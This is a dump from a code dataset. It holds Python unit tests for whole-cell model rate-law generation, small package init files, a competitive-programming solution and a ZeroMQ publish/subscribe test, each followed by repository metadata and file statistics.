            model, reaction, substrates_as_modifiers=[species['s3_c']])
        self.assertEqual(rate_law2.expression, 'k_cat_r1 * s3[c] * '
                         '(s1[c] / (s1[c] + K_m_r1_s1 * Avogadro * volume_c)) * '
                         '(s2[c] / (s2[c] + K_m_r1_s2 * Avogadro * volume_c)) * '
                         '(s4[c] / (s4[c] + K_m_r1_s4 * Avogadro * volume_c))')
        self.assertEqual(set([i.gen_id() for i in rate_law2.species]), set(['s1[c]', 's2[c]', 's3[c]', 's4[c]']))
        self.assertEqual(set(rate_law2.parameters), set(parameters))
        self.assertEqual(rate_law2.parameters.get_one(id='k_cat_r1').type, wc_ontology['WC:k_cat'])
        self.assertEqual(rate_law2.parameters.get_one(id='k_cat_r1').units, unit_registry.parse_units('s^-1 molecule^-1'))
        self.assertEqual(rate_law2.parameters.get_one(id='K_m_r1_s2').type, wc_ontology['WC:K_m'])
        self.assertEqual(rate_law2.parameters.get_one(id='K_m_r1_s2').units, unit_registry.parse_units('M'))

        rate_law3, parameters = utils.gen_michaelis_menten_like_propensity_function(
            model, reaction, substrates_as_modifiers=[species['s3_c']], exclude_substrates=[species['s1_c']])
        self.assertEqual(rate_law3.expression, 'k_cat_r1 * s3[c] * '
                         '(s2[c] / (s2[c] + K_m_r1_s2 * Avogadro * volume_c)) * '
                         '(s4[c] / (s4[c] + K_m_r1_s4 * Avogadro * volume_c))')
        self.assertEqual(set([i.gen_id() for i in rate_law3.species]), set(['s2[c]', 's3[c]', 's4[c]']))
        self.assertEqual(set(rate_law3.parameters), set(parameters))

    def test_gen_response_functions(self):
        model = wc_lang.Model()
        beta = 2

        init_volume = wc_lang.core.InitVolume(distribution=wc_ontology['WC:normal_distribution'], mean=0.5, std=0)
        c = wc_lang.Compartment(id='c', name='cytosol', init_volume=init_volume)
        c.init_density = wc_lang.Parameter(id='density_' + c.id, value=1.)

        volume = wc_lang.Function(id='volume_' + c.id)
        volume.expression, error = wc_lang.FunctionExpression.deserialize(f'{c.id} / {c.init_density.id}', {
            wc_lang.Compartment: {c.id: c},
            wc_lang.Parameter: {c.init_density.id: c.init_density},
        })
        assert error is None, str(error)

        reaction = wc_lang.Reaction()
        species_types = {}
        species = {}
        for i in range(1, 5):
            Id = 's' + str(i)
            species_types[Id] = wc_lang.SpeciesType(model=model, id=Id, name='species_type_{}'.format(i))
            model_species = wc_lang.Species(model=model, species_type=species_types[Id], compartment=c)
            model_species.id = model_species.gen_id()
            species[Id + '_c'] = model_species
            wc_lang.DistributionInitConcentration(species=species[Id + '_c'], mean=0.5)

        factors = [['s1', 'species_type_2'], ['s3'], ['species_type_4']]
        factor_exp, all_species, all_parameters, all_volumes, all_observables = utils.gen_response_functions(
            model, beta, 'reaction_id', 'reaction_class', c, factors)
        self.assertEqual(factor_exp, [
            '(reaction_class_factors_c_1 / (reaction_class_factors_c_1 + K_m_reaction_class_reaction_class_factors_c_1 * Avogadro * volume_c))',
            '(s3[c] / (s3[c] + K_m_reaction_id_s3 * Avogadro * volume_c))',
            '(s4[c] / (s4[c] + K_m_reaction_id_s4 * Avogadro * volume_c))'])
        self.assertEqual(all_species, {'s1[c]': species['s1_c'], 's2[c]': species['s2_c'], 's3[c]': species['s3_c'], 's4[c]': species['s4_c']})
        self.assertEqual(len(all_parameters), 4)
        self.assertEqual(all_parameters['Avogadro'].value, scipy.constants.Avogadro)
        self.assertEqual(all_parameters['Avogadro'].units, unit_registry.parse_units('molecule mol^-1'))
        self.assertEqual(all_parameters['K_m_reaction_class_reaction_class_factors_c_1'].value, beta * 1. / scipy.constants.Avogadro / c.init_volume.mean)
        self.assertEqual(all_parameters['K_m_reaction_class_reaction_class_factors_c_1'].comments, 'The value was assumed to be 2 times the value of reaction_class_factors_c_1')
        self.assertEqual(all_parameters['K_m_reaction_id_s3'].value, beta * 0.5 / scipy.constants.Avogadro / c.init_volume.mean)
        self.assertEqual(all_parameters['K_m_reaction_id_s4'].type, wc_ontology['WC:K_m'])
        self.assertEqual(all_parameters['K_m_reaction_id_s4'].units, unit_registry.parse_units('M'))
        self.assertEqual(all_parameters['K_m_reaction_id_s4'].comments, 'The value was assumed to be 2 times the concentration of s4 in cytosol')
        self.assertEqual(all_volumes, {'volume_c': volume})
        self.assertEqual(len(all_observables), 1)
        self.assertEqual(len(model.observables), 1)
        self.assertEqual(all_observables['reaction_class_factors_c_1'].name, 'factor for reaction_class in cytosol')
        self.assertEqual(all_observables['reaction_class_factors_c_1'].units, unit_registry.parse_units('molecule'))
        self.assertEqual(all_observables['reaction_class_factors_c_1'].expression.expression, 's1[c] + s2[c]')

        for i in range(5, 9):
            Id = 's' + str(i)
            species_types[Id] = wc_lang.SpeciesType(model=model, id=Id, name='species_type_{}'.format(i))
            model_species = wc_lang.Species(model=model, species_type=species_types[Id], compartment=c)
            model_species.id = model_species.gen_id()
            species[Id + '_c'] = model_species
            wc_lang.DistributionInitConcentration(species=species[Id + '_c'], mean=0.)

        factors = [['s5', 'species_type_6'], ['s7'], ['species_type_8']]
        factor_exp, all_species, all_parameters, all_volumes, all_observables = utils.gen_response_functions(
            model, beta, 'reaction_id', 'reaction_class', c, factors)
        self.assertEqual(len(model.observables), 2)
        self.assertEqual(all_parameters['K_m_reaction_class_reaction_class_factors_c_2'].value, 1e-05)
        self.assertEqual(all_parameters['K_m_reaction_class_reaction_class_factors_c_2'].comments,
                         'The value was assigned to 1e-05 because the value of reaction_class_factors_c_2 was zero')
        self.assertEqual(all_parameters['K_m_reaction_id_s7'].value, 1e-05)
        self.assertEqual(all_parameters['K_m_reaction_id_s8'].comments, 'The value was assigned to 1e-05 because the concentration of s8 in cytosol was zero')

        factors = [['s5', 'species_type_6']]
        factor_exp, all_species, all_parameters, all_volumes, all_observables = utils.gen_response_functions(
            model, beta, 'reaction_id2', 'reaction_class2', c, factors)
        self.assertEqual(len(model.observables), 2)
        self.assertEqual(all_parameters['K_m_reaction_class2_reaction_class_factors_c_2'].value, 1e-05)

    def test_gen_mass_action_rate_law(self):
        model = wc_lang.Model()
        c = wc_lang.Compartment(id='c', init_volume=wc_lang.InitVolume(mean=0.5))
        c.init_density = wc_lang.Parameter(id='density_' + c.id, value=1.)
        kinetic_parameter = wc_lang.Parameter(id='this_parameter', value=1.)

        volume = wc_lang.Function(id='volume_' + c.id)
        volume.expression, error = wc_lang.FunctionExpression.deserialize(f'{c.id} / {c.init_density.id}', {
            wc_lang.Compartment: {c.id: c},
            wc_lang.Parameter: {c.init_density.id: c.init_density},
        })
        assert error is None, str(error)

        species_types = {}
        species = {}
        for i in range(1, 7):
            Id = 's' + str(i)
            species_types[Id] = wc_lang.SpeciesType(id=Id)
            species[Id + '_c'] = wc_lang.Species(species_type=species_types[Id], compartment=c)
            wc_lang.DistributionInitConcentration(species=species[Id + '_c'], mean=0.5)
        Id = 'e'
        species_types[Id] = wc_lang.SpeciesType(id=Id)
        species[Id + '_c'] = wc_lang.Species(species_type=species_types[Id], compartment=c)
        wc_lang.DistributionInitConcentration(species=species[Id + '_c'], mean=0.5)

        # ob_exp1, error = wc_lang.ObservableExpression.deserialize('s4[c] + s5[c]', {
        #     wc_lang.Species: {species['s4_c'].gen_id(): species['s4_c'],
        #                       species['s5_c'].gen_id(): species['s5_c']}})
        # assert error is None, str(error)
        # modifier1 = wc_lang.Observable(id='e1', expression=ob_exp1)
        # ob_exp2, error = wc_lang.ObservableExpression.deserialize('2 * s6[c]', {
        #     wc_lang.Species: {species['s6_c'].gen_id(): species['s6_c']}})
        # assert error is None, str(error)
        # modifier2 = wc_lang.Observable(id='e2', expression=ob_exp2)

        participant1 = wc_lang.SpeciesCoefficient(species=species['s1_c'], coefficient=-1)
        participant2 = wc_lang.SpeciesCoefficient(species=species['s2_c'], coefficient=-1)
        participant3 = wc_lang.SpeciesCoefficient(species=species['s3_c'], coefficient=1)
        participant4 = wc_lang.SpeciesCoefficient(species=species['s4_c'], coefficient=1)
        enzyme_lhs = wc_lang.SpeciesCoefficient(species=species['e_c'], coefficient=-1)
        enzyme_rhs = wc_lang.SpeciesCoefficient(species=species['e_c'], coefficient=1)

        reaction = wc_lang.Reaction(id='Association', participants=[participant1, participant2, participant3])
        rate_law, parameters = utils.gen_mass_action_rate_law(model, reaction, kinetic_parameter)
        self.assertTrue(rate_law.expression == 'this_parameter * s1[c] * s2[c]' or
                        rate_law.expression == 'this_parameter * s2[c] * s1[c]')
        self.assertEqual(set([i.gen_id() for i in rate_law.species]), set(['s1[c]', 's2[c]']))
        # self.assertEqual(set(rate_law.observables), set([modifier1, modifier2]))
        self.assertEqual(set(rate_law.parameters), set(parameters))
        # self.assertEqual(rate_law.parameters.get_one(id='k_r1').type, wc_ontology['WC:k_cat'])
        self.assertEqual(rate_law.parameters.get_one(id='this_parameter').units, unit_registry.parse_units('s^-1 * molecule^-1'))
        # self.assertEqual(rate_law.parameters.get_one(id='K_m_r1_s2').type, wc_ontology['WC:K_m'])
        # self.assertEqual(rate_law.parameters.get_one(id='K_m_r1_s2').units, unit_registry.parse_units('M'))

        reaction = wc_lang.Reaction(id='Dissociation', participants=[participant1, participant3, participant4])
        rate_law, parameters = utils.gen_mass_action_rate_law(model, reaction, kinetic_parameter)
        self.assertEqual(rate_law.expression, 'this_parameter * s1[c]')
        self.assertEqual(set([i.gen_id() for i in rate_law.species]), set(['s1[c]']))
        self.assertEqual(rate_law.parameters.get_one(id='this_parameter').units, unit_registry.parse_units('s^-1'))

        reaction = wc_lang.Reaction(id='Degradation1', participants=[participant1])
        rate_law, parameters = utils.gen_mass_action_rate_law(model, reaction, kinetic_parameter)
        self.assertEqual(rate_law.expression, 'this_parameter * s1[c]')
        self.assertEqual(set([i.gen_id() for i in rate_law.species]), set(['s1[c]']))
        self.assertEqual(rate_law.parameters.get_one(id='this_parameter').units, unit_registry.parse_units('s^-1'))

        reaction = wc_lang.Reaction(id='Degradation2', participants=[participant1, enzyme_lhs, enzyme_rhs])
        rate_law, parameters = utils.gen_mass_action_rate_law(model, reaction, kinetic_parameter)
        self.assertTrue(rate_law.expression == 'this_parameter * s1[c] * e[c]' or
                        rate_law.expression == 'this_parameter * e[c] * s1[c]')
        self.assertEqual(set([i.gen_id() for i in rate_law.species]), set(['s1[c]', 'e[c]']))
        self.assertEqual(rate_law.parameters.get_one(id='this_parameter').units, unit_registry.parse_units('s^-1 * molecule^-1'))

        reaction = wc_lang.Reaction(id='Synthesis1', participants=[participant3])
        rate_law, parameters = utils.gen_mass_action_rate_law(model, reaction, kinetic_parameter)
        self.assertEqual(rate_law.expression, 'this_parameter')
        self.assertEqual(set([i.gen_id() for i in rate_law.species]), set([]))
        self.assertEqual(rate_law.parameters.get_one(id='this_parameter').units, unit_registry.parse_units('s^-1 * molecule'))

        reaction = wc_lang.Reaction(id='Synthesis2', participants=[enzyme_lhs, enzyme_rhs, participant3])
        rate_law, parameters = utils.gen_mass_action_rate_law(model, reaction, kinetic_parameter)
        self.assertEqual(rate_law.expression, 'this_parameter * e[c]')
        self.assertEqual(set([i.gen_id() for i in rate_law.species]), set(['e[c]']))
        self.assertEqual(rate_law.parameters.get_one(id='this_parameter').units, unit_registry.parse_units('s^-1'))

        reaction = wc_lang.Reaction(id='Conversion', participants=[participant1, enzyme_lhs, enzyme_rhs, participant3])  # Ask Yin Hoon why I can add as many copies of participant2 as I want.
        rate_law, parameters = utils.gen_mass_action_rate_law(model, reaction, kinetic_parameter)
        self.assertTrue(rate_law.expression == 'this_parameter * s1[c] * e[c]' or
                        rate_law.expression == 'this_parameter * e[c] * s1[c]')
        self.assertEqual(set([i.gen_id() for i in rate_law.species]), set(['s1[c]', 'e[c]']))
        self.assertEqual(rate_law.parameters.get_one(id='this_parameter').units, unit_registry.parse_units('s^-1 * molecule^-1'))
 | 59.736842 | 190 | 0.67428 | 3,852 | 29,510 | 4.90135 | 0.068017 | 0.039725 | 0.026112 | 0.026801 | 0.865413 | 0.837341 | 0.80572 | 0.784057 | 0.754661 | 0.719756 | 0 | 0.023302 | 0.188546 | 29,510 | 494 | 191 | 59.736842 | 0.765138 | 0.036733 | 0 | 0.484293 | 0 | 0 | 0.151658 | 0.031965 | 0 | 0 | 0 | 0 | 0.282723 | 1 | 0.02356 | false | 0 | 0.018325 | 0 | 0.044503 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6
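The rate-law strings asserted in the tests above all share two shapes: a Michaelis–Menten-like law, `k_cat` times one saturation factor `s / (s + K_m * Avogadro * V)` per substrate, and a mass-action law, a rate constant times the product of reactant counts. A stdlib-only sketch of both shapes with plain floats standing in for `wc_lang` species counts (the helper names are illustrative, not the `wc_model_gen` API):

```python
# Hypothetical helpers that mirror the rate-law shapes asserted above;
# they are not part of wc_lang / wc_model_gen.
AVOGADRO = 6.02214076e23  # molecule mol^-1

def michaelis_menten_like_rate(k_cat, counts, k_m, volume):
    """k_cat * prod_i s_i / (s_i + K_m_i * N_A * V); counts in molecules, K_m in M, V in L."""
    rate = k_cat
    for species_id, count in counts.items():
        rate *= count / (count + k_m[species_id] * AVOGADRO * volume)
    return rate

def mass_action_rate(k, reactant_counts):
    """k times the product of reactant counts (unit stoichiometry assumed)."""
    rate = k
    for count in reactant_counts.values():
        rate *= count
    return rate
```

Choosing each `K_m` so that `K_m * N_A * V` equals the species count makes every saturation factor exactly 1/2, which is the half-saturation reading of `K_m` that the tests' default values (2 times the initial concentration) are built around.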
0e6a69372d51e5edb892ba9530a96041d9ac1696 | 82 | py | Python | regression/__init__.py | george-j-zhu/timeseriesprocessing | 5d774a438c5e835a8d5c802009f4d5303388b69d | [
"CC-BY-4.0"
] | 1 | 2018-06-26T05:27:55.000Z | 2018-06-26T05:27:55.000Z | regression/__init__.py | george-j-zhu/timeseriesprocessing | 5d774a438c5e835a8d5c802009f4d5303388b69d | [
"CC-BY-4.0"
] | null | null | null | regression/__init__.py | george-j-zhu/timeseriesprocessing | 5d774a438c5e835a8d5c802009f4d5303388b69d | [
"CC-BY-4.0"
] | null | null | null | from . import timeSeriesDataFrame
from . import constants
from . import utilities
| 20.5 | 33 | 0.817073 | 9 | 82 | 7.444444 | 0.555556 | 0.447761 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.146341 | 82 | 3 | 34 | 27.333333 | 0.957143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0e755c3e59cfea99b2c1bb3b5c46310bfdfa3f04 | 163 | py | Python | ABC/180/A.py | yu9824/AtCoder | 50a209059c005efadc1c912e443ec41365381c16 | [
"MIT"
] | null | null | null | ABC/180/A.py | yu9824/AtCoder | 50a209059c005efadc1c912e443ec41365381c16 | [
"MIT"
] | null | null | null | ABC/180/A.py | yu9824/AtCoder | 50a209059c005efadc1c912e443ec41365381c16 | [
"MIT"
] | null | null | null | # list(map(int, input().split()))
# int(input())
def main():
    N, A, B = list(map(int, input().split()))
    print(N-A+B)


if __name__ == '__main__':
    main() | 18.111111 | 45 | 0.539877 | 25 | 163 | 3.2 | 0.52 | 0.3 | 0.25 | 0.375 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.196319 | 163 | 9 | 46 | 18.111111 | 0.610687 | 0.269939 | 0 | 0 | 0 | 0 | 0.068376 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0 | 0 | 0.2 | 0.2 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6
7d05b1e5b65fc151ebf19a8dc46105621faeb9d1 | 76 | py | Python | torchlib/datasets/__init__.py | CarlosPena00/kaggle-datasciencebowl-2018 | c234f03483142f618825812d5fa310375a7eb6fa | [
"MIT"
] | null | null | null | torchlib/datasets/__init__.py | CarlosPena00/kaggle-datasciencebowl-2018 | c234f03483142f618825812d5fa310375a7eb6fa | [
"MIT"
] | null | null | null | torchlib/datasets/__init__.py | CarlosPena00/kaggle-datasciencebowl-2018 | c234f03483142f618825812d5fa310375a7eb6fa | [
"MIT"
] | 2 | 2018-12-16T00:17:40.000Z | 2019-11-18T09:47:23.000Z |
from .dsxbdata import *
from .ctechdata import *
from .imageutl import *
| 10.857143 | 24 | 0.723684 | 9 | 76 | 6.111111 | 0.555556 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.197368 | 76 | 6 | 25 | 12.666667 | 0.901639 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7d405b30bc0bef9d0fe269e4ce56869f39aa23f3 | 119 | py | Python | short_lived_tokens/endec/__init__.py | FriedBotStudio/short_lived_tokens | dd823cfd81ae6e211f9281826bb367a8fcb6fd5a | [
"MIT"
] | null | null | null | short_lived_tokens/endec/__init__.py | FriedBotStudio/short_lived_tokens | dd823cfd81ae6e211f9281826bb367a8fcb6fd5a | [
"MIT"
] | null | null | null | short_lived_tokens/endec/__init__.py | FriedBotStudio/short_lived_tokens | dd823cfd81ae6e211f9281826bb367a8fcb6fd5a | [
"MIT"
] | null | null | null | from short_lived_tokens.endec.engine import EndecEngine
from short_lived_tokens.endec.rsa_engine import RSAEndecEngine
| 39.666667 | 62 | 0.89916 | 17 | 119 | 6 | 0.588235 | 0.176471 | 0.27451 | 0.392157 | 0.490196 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.067227 | 119 | 2 | 63 | 59.5 | 0.918919 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
addb111c0815305675f44504a409da95bcbd1d1c | 28 | py | Python | xrsigproc/__init__.py | kaipak/xrsigproc | 109cab137ea7e9e61a3cdffe6b8cbac8bd52fc3f | [
"MIT"
] | null | null | null | xrsigproc/__init__.py | kaipak/xrsigproc | 109cab137ea7e9e61a3cdffe6b8cbac8bd52fc3f | [
"MIT"
] | null | null | null | xrsigproc/__init__.py | kaipak/xrsigproc | 109cab137ea7e9e61a3cdffe6b8cbac8bd52fc3f | [
"MIT"
] | null | null | null | from .xrsigproc import *
| 14 | 27 | 0.678571 | 3 | 28 | 6.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 28 | 1 | 28 | 28 | 0.904762 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
adeeb83881cf0b29cee8848279015e85dd9622e2 | 71 | py | Python | gpgLabs/EM/__init__.py | victortocantins/gpgLabs | 310b69c681dd1ebf91ba8be2b5ac27adf5fc0f12 | [
"MIT"
] | null | null | null | gpgLabs/EM/__init__.py | victortocantins/gpgLabs | 310b69c681dd1ebf91ba8be2b5ac27adf5fc0f12 | [
"MIT"
] | null | null | null | gpgLabs/EM/__init__.py | victortocantins/gpgLabs | 310b69c681dd1ebf91ba8be2b5ac27adf5fc0f12 | [
"MIT"
] | null | null | null | from . import FEM3loop
from . import FEMpipe
from . import ResponseFct
| 17.75 | 25 | 0.788732 | 9 | 71 | 6.222222 | 0.555556 | 0.535714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016949 | 0.169014 | 71 | 3 | 26 | 23.666667 | 0.932203 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bc1b34a776cfb4ef22883529b144cf5750666882 | 96 | py | Python | venv/lib/python3.8/site-packages/setuptools/__init__.py | GiulianaPola/select_repeats | 17a0d053d4f874e42cf654dd142168c2ec8fbd11 | [
"MIT"
] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/setuptools/__init__.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/setuptools/__init__.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/21/e4/69/64abd25b8c299895c989a21f571e044f02e365df9ae7b460d42f2e3b1b | 96 | 96 | 0.895833 | 9 | 96 | 9.555556 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.4375 | 0 | 96 | 1 | 96 | 96 | 0.458333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bc213c8197e7bdffa409e407d93312481e196b5f | 77 | py | Python | snippets/super_simple/sys.py | fpiantini/python_snippets | 3d7ad42c2e3a77f46c8e373bb51ea3227801a239 | [
"MIT"
] | null | null | null | snippets/super_simple/sys.py | fpiantini/python_snippets | 3d7ad42c2e3a77f46c8e373bb51ea3227801a239 | [
"MIT"
] | null | null | null | snippets/super_simple/sys.py | fpiantini/python_snippets | 3d7ad42c2e3a77f46c8e373bb51ea3227801a239 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#
import sys
print(sys.version)
print(sys.float_info)
| 11 | 21 | 0.74026 | 13 | 77 | 4.307692 | 0.769231 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103896 | 77 | 6 | 22 | 12.833333 | 0.811594 | 0.25974 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
bc28113660044d65cef0416f1e88f3f44fcb6fdc | 29 | py | Python | scuttle/__init__.py | scuttle/python-scuttle | 273e793b15b4f4390b3991ba66192d27b392ed3a | [
"MIT"
] | 1 | 2021-03-30T05:31:19.000Z | 2021-03-30T05:31:19.000Z | scuttle/__init__.py | scuttle/python-scuttle | 273e793b15b4f4390b3991ba66192d27b392ed3a | [
"MIT"
] | 9 | 2020-05-23T07:33:00.000Z | 2020-09-27T03:32:51.000Z | scuttle/__init__.py | scuttle/python-scuttle | 273e793b15b4f4390b3991ba66192d27b392ed3a | [
"MIT"
] | null | null | null | from .wrapper import scuttle
| 14.5 | 28 | 0.827586 | 4 | 29 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 29 | 1 | 29 | 29 | 0.96 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bc2f2035ec6f7f2e3ab05b873bace145372a009a | 1,759 | py | Python | retired/old_version/original/tests/test_echo_topic.py | gecko-robotics/pygecko | a809593a894d8e591e992455a01aa73d8f7b7981 | [
"MIT"
] | 3 | 2019-06-13T07:52:12.000Z | 2020-07-05T13:28:43.000Z | retired/old_version/original/tests/test_echo_topic.py | walchko/pygecko | a809593a894d8e591e992455a01aa73d8f7b7981 | [
"MIT"
] | 23 | 2017-07-07T01:29:33.000Z | 2018-11-23T18:41:08.000Z | retired/old_version/original/tests/test_echo_topic.py | MomsFriendlyRobotCompany/pygecko | a809593a894d8e591e992455a01aa73d8f7b7981 | [
"MIT"
] | null | null | null |
from __future__ import print_function
# import sys
import threading
import time
from pygecko import ZmqClass as Zmq
from pygecko import Messages as Msg
# from pygecko.Topic import TopicPub
# import random
# import zmq
def subscriber(msg):
    # Subscribe to everything
    sub = Zmq.Sub('test', connect_to=('localhost', 9000))

    # Get and process messages
    for i in range(7):
        tp, ret = sub.recv()
        if ret:
            assert ret == msg
            print('found:', ret == msg)
            return
        time.sleep(0.1)


def publisher(msg):
    # Prepare publisher
    pub = Zmq.Pub(bind_to=('localhost', 9000))

    for i in range(7):
        pub.pub('test', msg)
        time.sleep(0.1)


def test():
    msg = Msg.Vector()
    msg.set(1, 2, 3)

    pub_thread = threading.Thread(target=publisher, args=(msg,))
    pub_thread.daemon = True
    pub_thread.start()
    sub_thread = threading.Thread(target=subscriber, args=(msg,))
    sub_thread.daemon = True
    sub_thread.start()

    pub_thread.join()
    sub_thread.join()
    time.sleep(0.1)
# def topic(msg):
# # Subscribe to everything
# sub = Zmq.Sub('test', connect_to=('localhost', 9000))
#
# # Get and process messages
# for i in range(7):
# tp, ret = sub.recv()
# if ret:
# assert ret == msg
# print 'found:', ret == msg
# return
# time.sleep(0.1)
#
#
# def echo(msg):
# # Prepare publisher
# pub = Zmq.Pub(bind_to=('localhost', 9000))
#
# for i in range(7):
# pub.pub('test', msg)
# time.sleep(0.1)
#
#
# def test():
# msg = Msg.Vector()
# msg.set(1, 2, 3)
#
# pub_thread = threading.Thread(target=publisher, args=(msg,))
# pub_thread.daemon = True
# pub_thread.start()
# sub_thread = threading.Thread(target=subscriber, args=(msg,))
# sub_thread.daemon = True
# sub_thread.start()
#
# pub_thread.join()
# sub_thread.join()
# time.sleep(0.1)
| 19.544444 | 64 | 0.660034 | 264 | 1,759 | 4.30303 | 0.231061 | 0.06338 | 0.052817 | 0.058099 | 0.819542 | 0.816901 | 0.816901 | 0.816901 | 0.816901 | 0.816901 | 0 | 0.026371 | 0.180785 | 1,759 | 89 | 65 | 19.764045 | 0.761971 | 0.486072 | 0 | 0.16129 | 0 | 0 | 0.037471 | 0 | 0 | 0 | 0 | 0 | 0.032258 | 1 | 0.096774 | false | 0 | 0.16129 | 0 | 0.290323 | 0.064516 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
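The pygecko test above follows a common pub/sub test pattern: a daemon publisher thread emits the same message several times, a subscriber polls with a timeout, and an assertion checks that the payload round-trips. A ZMQ-free sketch of the same pattern using only the standard library (`queue.Queue` stands in for the socket pair; all names here are illustrative, not the pygecko API):

```python
import queue
import threading
import time

def publisher(q, msg, n=7):
    # Publish the same message a few times, like pub.pub('test', msg)
    for _ in range(n):
        q.put(('test', msg))
        time.sleep(0.01)

def subscriber(q, msg, found):
    # Poll for messages; record the payload once it round-trips
    for _ in range(7):
        try:
            topic, ret = q.get(timeout=0.1)
        except queue.Empty:
            continue
        if ret == msg:
            found.append(ret)
            return

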